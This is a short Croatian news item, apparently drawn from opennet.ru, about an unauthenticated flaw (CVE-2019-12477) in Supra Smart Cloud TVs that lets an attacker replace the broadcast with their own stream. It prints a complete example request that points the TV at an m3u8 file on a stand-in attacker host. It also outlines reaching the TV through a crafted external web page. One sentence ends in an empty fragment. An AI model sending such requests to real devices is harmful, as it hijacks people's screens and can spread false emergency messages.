Na Supra Smart Cloud TV-ima ranjivost (CVE-2019-12477) koja vam omogućuje zamjenu trenutno gledanog programa sadržajem napadača. Kao primjer prikazan je izlaz fiktivnog upozorenja o izvanrednoj situaciji.
Za napad je dovoljno poslati posebno izrađen mrežni zahtjev koji ne zahtijeva autentifikaciju. Konkretno, možete pristupiti rukovatelju “/remote/media_control?action=setUri&uri=” navođenjem URL-a m3u8 datoteke s video parametrima, na primjer “http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.”
U većini slučajeva, pristup IP adresi televizora ograničen je na internu mrežu, ali budući da se zahtjev šalje putem HTTP-a, moguće je koristiti metode za pristup internim resursima kada korisnik otvori posebno dizajniranu vanjsku stranicu (na primjer, pod krinka zahtjeva za sliku ili pomoću ).
Izvor: opennet.ru